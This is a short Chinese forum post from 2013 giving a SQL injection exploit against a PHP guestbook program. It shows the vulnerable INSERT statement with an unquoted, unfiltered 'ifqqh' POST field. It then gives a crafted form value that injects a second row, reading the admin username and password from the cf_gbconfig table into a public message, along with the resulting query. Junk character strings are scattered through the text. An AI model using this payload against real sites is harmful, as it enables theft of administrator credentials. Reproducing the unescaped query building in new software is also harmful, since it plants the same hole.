留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
3 C) o( s6 s2 x4 o$ v
: H2 m: Y/ o% Z$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
& b" a! Z+ q3 ~! |5 ~$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
; a. h- }9 ]7 @+ P: H/ _& B
$ z9 T0 D# H' q- Z; S* G提交的时候把ifqqh的值改一下。变成
- I$ t1 V, H# [+ G# P4 l6 `) W& N1 d0 X, ]
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />5 K5 T# ]4 `/ C3 ^# m$ I; H9 N% I6 ~
( M6 W3 ?& v* c# T; k9 ^
这样SQL插入语句就变了.+ G& r+ _" m5 A# R) I3 t
+ V1 @% a$ x- L% T0 V0 {9 `: X1 Linsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)2 C9 ]) k9 y( f" L3 n9 ^
2 N* T0 U, G0 U9 W/ T; F+ W* Z9 a0 y
构造了另外一句SQL。并且把帐号密码读出来。
3 n1 z, T: Z8 e1 E! @
$ Z% O2 {: k# y7 U) K |
发表于 2013-2-19 08:10:11
收藏
支持
反对